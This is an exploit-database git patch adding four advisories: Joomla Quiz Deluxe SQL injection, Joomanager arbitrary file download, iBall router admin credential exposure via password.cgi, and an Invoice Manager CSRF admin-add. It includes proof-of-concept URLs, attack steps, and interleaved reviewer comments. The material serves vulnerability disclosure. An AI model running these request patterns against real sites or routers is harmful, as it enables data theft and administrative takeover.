From 6b9cb90c813c4ce5ed545ea75eaf910b60838855 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 31 Aug 2017 05:01:22 +0000
Subject: [PATCH] DB: 2017-08-31 4 new exploits Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection Joomla! Component Joomanager 2.0.0 - Arbitrary File Download iBall Baton 150M Wireless Router - Authentication Bypass Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)
---
 files.csv | 4 ++
 platforms/php/webapps/42589.txt | 26 +++++++++++
 platforms/php/webapps/42590.txt | 25 +++++++++++
 platforms/php/webapps/42591.txt | 74 ++++++++++++++++++++++++++++++++
 platforms/php/webapps/42592.html | 73 +++++++++++++++++++++++++++++++
 5 files changed, 202 insertions(+)
 create mode 100755 platforms/php/webapps/42589.txt
 create mode 100755 platforms/php/webapps/42590.txt
 create mode 100755 platforms/php/webapps/42591.txt
 create mode 100755 platforms/php/webapps/42592.html
diff --git a/files.csv b/files.csv
index 48593d927..f24719077 100644
--- a/files.csv
+++ b/files.csv
@@ -38373,3 +38373,7 @@ id,file,description,date,author,platform,type,port
 42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
 42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
 42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
+42589,platforms/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps,0
+42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
+42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
+42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
diff --git a/platforms/php/webapps/42589.txt b/platforms/php/webapps/42589.txt
new file mode 100755
index 000000000..98e7c748c
--- /dev/null
+++ b/platforms/php/webapps/42589.txt
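Review bot: The new 42591 row files the iBall router firmware advisory under `platforms/php/webapps/42591.txt` with platform `php`, while the neighbouring context row for the Brickcom IP camera (42588) uses `platforms/hardware/webapps/42588.txt` and platform `hardware`; a router-firmware advisory looks like it belongs in that same category, i.e. `42591,platforms/hardware/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,hardware,webapps,0`, with the created file moved to match. The row's date 2017-03-07 agrees with the advisory's own date but not with the 2017-08-30 carried by the other three additions, so it is worth confirming which date the column is meant to hold. The author field is also the only one of the four new rows left unquoted; `"Indrajith.A.N"` would match the surrounding rows.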
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
+# Dork: N/A
+# Date: 30.08.2017
+# Vendor Homepage: http://joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/
+# Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe
+# Version: 3.7.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42590.txt b/platforms/php/webapps/42590.txt
new file mode 100755
index 000000000..e18a6d288
--- /dev/null
+++ b/platforms/php/webapps/42590.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 30.08.2017
+# Vendor Homepage: http://www.joomanager.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
+# Demo: http://www.joomanager.com/demo/realestate
+# Version: 2.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The security obligation allows an attacker to arbitrary download files..
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
+#
+# Etc..
+# # # # #
\ No newline at end of file
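Review bot: The header block records `# CVE: N/A` and a Tested-on line but nothing about vendor notification or which release fixes the issue, so someone triaging a Quiz Deluxe 3.7.4 installation cannot tell from this entry whether upgrading helps; the same gap exists in the 42590 and 42591 advisories added in this commit. I'd add a line beside the CVE line such as `# Fixed in: [version or N/A — placeholder]`. The Description `# The vulnerability allows an attacker to inject sql commands....` should also name the two request parameters the PoC exercises, `stu_quiz_id` and `flag_quest` of the `ajaxaction.flag_question` task, since those are what a defender would filter on or watch for in access logs; the four trailing dots and `# Etc..` are loose wording for a database record.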
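Review bot: The Description line `# The security obligation allows an attacker to arbitrary download files..` reads as a mistranslation and does not say what is wrong. Based on the PoC, which hands a caller-chosen value to the `path` parameter of the `download` task, I'd reword it to `# The download task of com_joomanager presumably serves the file named by the user-supplied 'path' parameter, allowing arbitrary file download.` Whether the component applies any directory restriction cannot be told from this advisory, so the wording should stay hedged unless that has been confirmed.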
diff --git a/platforms/php/webapps/42591.txt b/platforms/php/webapps/42591.txt
new file mode 100755
index 000000000..f15b94d6b
--- /dev/null
+++ b/platforms/php/webapps/42591.txt
@@ -0,0 +1,74 @@
+Title:
+====
+iball Baton 150M Wireless router - Authentication Bypass
+
+Credit:
+======
+Name: Indrajith.A.N
+Website: https://www.indrajithan.com
+
+Date:
+====
+07-03-2017
+
+Vendor:
+======
+iball Envisioning the tremendous potential for innovative products required
+by the ever evolving users in computing and digital world, iBall was
+launched in September 2001 and which is one of the leading networking
+company
+
+Product:
+=======
+iball Baton 150M Wireless-N ADSI.2+ Router
+
+Product link:
+http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
+
+Abstract:
+=======
+iball Baton 150M Router's login page is insecurely developed that any
+attacker could bypass the admin's authentication just by tweaking the
+password.cgi file.
+
+Affected Version:
+=============
+Firmware Version : 1.2.6 build 110401 Rel.47776n
+Hardware Version : iB-WRA150N v1 00000001
+
+Exploitation-Technique:
+===================
+Remote
+
+Severity Rating:
+===================
+9
+
+Details:
+=======
+Any attacker can escalate his privilege to admin using this vulnerability.
+
+Proof Of Concept:
+================
+1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
+i.e 172.20.174.1
+
+2) Now just append password.cgi to the URL i.e
+http://172.20.174.1/password.cgi
+
+3) Right-click and View Source code which disclsus the username, password
+and user role of the admin in the comment section
+
+4) Successfully logged in using the disclosed credentials.
+
+Reference:
+=========
+Video POC :
+https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
+
+Disclosure Timeline:
+======================================
+Vendor Notification: March 5, 2017
+
+-----
+Indrajith.A.N
\ No newline at end of file
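Review bot: The title and the files.csv row classify this as an Authentication Bypass, but the Abstract and steps 3-4 describe the admin username, password and role being readable in an HTML comment of `password.cgi`, apparently without logging in, which is a credentials disclosure (the class the neighbouring 42588 Brickcom entry is filed under) rather than a bypass of the login check; the title should say so, e.g. `iball Baton 150M Wireless router - Admin Credentials Disclosure`. `Severity Rating: 9` names no scale (CVSS or otherwise), the timeline records only `Vendor Notification: March 5, 2017` with no vendor response or fix status for firmware 1.2.6 build 110401 Rel.47776n, and there is no remediation section, which should at least state that credentials must not be embedded in served page source and that the admin password on affected units should be changed once the firmware is updated. Step 3 also has the typo `disclsus` for discloses.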
diff --git a/platforms/php/webapps/42592.html b/platforms/php/webapps/42592.html new file mode 100755 index 000000000..5d26222e8 --- /dev/null +++ b/platforms/php/webapps/42592.html @@ -0,0 +1,73 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + +# ======================================================== +# +# +# Invoice Manager v3.1 Cross site request forgery (Add Admin) +# +# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be +# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering). +# Once exploited, the attacker can login as the admin using the email and the password in the below exploit. +# +# +# ======================CSRF POC (Adding New user with Administrator Privileges)================================== + + + + +
+ + + + + + + + + + + + +# =================================================EOF ======================================================= +# +# +# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin +# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data.. +# +# +# Remedy : developer should implement CSRF token for each request +# +# +# +# ======================================================== +# [+] Disclaimer +# +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and that due +# credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit is given to +# the author. The author is not responsible for any misuse of the information contained +# herein and prohibits any malicious use of all security related information +# or exploits by the author or elsewhere. +# +# +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + + +